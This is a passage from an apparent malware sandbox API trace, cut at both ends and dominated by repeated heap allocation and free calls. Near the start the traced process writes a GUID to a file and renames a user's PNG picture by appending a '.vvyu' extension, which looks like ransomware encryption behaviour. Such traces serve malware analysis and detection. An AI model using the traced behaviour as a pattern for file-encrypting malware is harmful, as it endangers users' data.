hHeap=0x2c0000) returned 1 [0191.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.466] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.466] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.466] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.466] CloseHandle (hObject=0x584) returned 1 [0191.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.468] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\Vuc5gUsp1H33w.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\vuc5gusp1h33w.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\Vuc5gUsp1H33w.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\vuc5gusp1h33w.png.vvyu")) returned 1 [0191.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.470] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.474] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5abc640, ftCreationTime.dwHighDateTime=0x1d8a334, ftLastAccessTime.dwLowDateTime=0x660dad30, ftLastAccessTime.dwHighDateTime=0x1d8a49e, ftLastWriteTime.dwLowDateTime=0x660dad30, ftLastWriteTime.dwHighDateTime=0x1d8a49e, nFileSizeHigh=0x0, nFileSizeLow=0xda28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vuc5gUsp1H33w.png", cAlternateFileName="VUC5GU~1.PNG")) returned 0 [0191.474] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0191.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0191.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0191.475] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0191.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0191.475] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0191.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0191.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0191.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.512] HeapFree (in: 